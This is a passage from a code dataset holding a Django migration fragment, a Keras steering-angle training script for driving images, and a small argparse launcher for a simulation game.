migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('tribe', '0011_tribeaudioinspiration_video'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='TribeFeedItem',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('inspiration', models.CharField(max_length=50)),\n ('item_type', models.CharField(default=b'Audio Inspiration', max_length=50, choices=[(b'Audio Project', b'Audio Project'), (b'Audio Inspiration', b'Audio Inspiration')])),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('created', models.DateTimeField(default=django.utils.timezone.now)),\n ('project', models.ForeignKey(to='tribe.TribeAudioProject')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","sub_path":"src/tribe/migrations/0012_tribefeeditem.py","file_name":"0012_tribefeeditem.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"80411386","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 5 16:38:38 2017\n\n@author: guilherme\n\"\"\"\nimport sklearn\nimport csv \nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.models import Sequential\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D\nfrom keras.layers.convolutional import Convolution2D\nfrom sklearn.model_selection import train_test_split\n\nsamples = []\nwith open(\"/home/guilherme/data/driving_log.csv\") as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n samples.append(line)\n\ntrain_samples, validation_samples = train_test_split(samples, test_size=0.2)\n\n\ndef generator(samples, batch_size):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n sklearn.utils.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n\n images = []\n angles = []\n aug_images,aug_measurements = [],[]\n \n for batch_sample in batch_samples:\n center = '/home/guilherme/data/IMG/'+batch_sample[0].split('/')[-1]\n left = '/home/guilherme/data/IMG/'+batch_sample[1].split('/')[-1]\n right = '/home/guilherme/data/IMG/'+batch_sample[2].split('/')[-1]\n center_image = cv2.imread(center)\n left_image = cv2.imread(left)\n right_image = cv2.imread(right)\n \n try:\n center_angle = float(batch_sample[3])\n except Exception:\n center_angle = 0.0\n pass\n \n images.append(center_image)\n images.append(left_image)\n images.append(right_image)\n angles.append(center_angle)\n angles.append(center_angle) #left offset\n angles.append(center_angle) #right offset\n\n \t\t\n for image,measurement in zip(images,angles):\n aug_images.append(image)\n aug_images.append(cv2.flip(image,1))\n aug_measurements.append(measurement)\n aug_measurements.append(measurement*-1)\n\n # trim image to only see section with road\n X_train = np.array(images)\n y_train = np.array(angles)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=1)\nvalidation_generator = generator(validation_samples, batch_size=1)\n\n\nmodel = Sequential()\n# Preprocess incoming data, centered around zero with small standard deviation \n\nmodel.add(Lambda(lambda x: x/127 - 1.0,input_shape=(160, 320, 3),output_shape=(160,320,3)))\nmodel.add(Cropping2D(cropping=((70,25),(0,0))))\nmodel.add(Convolution2D(24,5,5,border_mode='valid', activation='relu', subsample=(2,2)))\nmodel.add(Convolution2D(36,5,5,border_mode='valid', activation='relu', subsample=(2,2)))\nmodel.add(Convolution2D(48,5,5,border_mode='valid', activation='relu', subsample=(2,2)))\nmodel.add(Convolution2D(64,3,3,border_mode='valid', activation='relu', subsample=(1,1)))\nmodel.add(Convolution2D(64,3,3,border_mode='valid', activation='relu', subsample=(1,1)))\nmodel.add(Flatten())\nmodel.add(Dense(1164, activation='relu'))\nmodel.add(Dense(100, activation='relu'))\nmodel.add(Dense(50, activation='relu'))\nmodel.add(Dense(10, activation='relu'))\nmodel.add(Dense(1, activation='tanh'))\nmodel.compile(loss='mse', optimizer='adam')\nhistoric=model.fit_generator(train_generator, steps_per_epoch=1000,epochs=4,verbose=1,\n validation_data=validation_generator,validation_steps=200)\n \nprint(historic.history.keys())\nplt.plot(historic.history['loss'])\nplt.plot(historic.history['val_loss'])\nplt.title('model mean squared error loss')\nplt.ylabel('mean squared error loss')\nplt.xlabel('epoch')\nplt.legend(['training set', 'validation set'], loc='upper right')\nplt.show()\n\n\n\n\nmodel.save(\"model.h5\")\n\n\n\n\n\n\n\n\n\n \n \n \n \n \n","sub_path":"model_gen.py","file_name":"model_gen.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"423673117","text":"import game\nimport argparse\n\n\ndef setup_parser():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-s', '--size_map',\thelp='define size of map', type=int, default=20)\n\tparser.add_argument('-sf', '--spawn_frequency', help='define spawn frequency in days', type=int, default = 1)\n\tparser.add_argument('-nd', '--night_duration', help='define night duration in seconds', type=float, default = 1.0)\n\treturn parser\n\n\nif __name__ == \"__main__\":\n\tparser = setup_parser()\n\targs = parser.parse_args()\n\n\tsimulation = game.Game(abs(args.size_map), abs(args.spawn_frequency), abs(args.night_duration))\n\n\tsimulation.start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}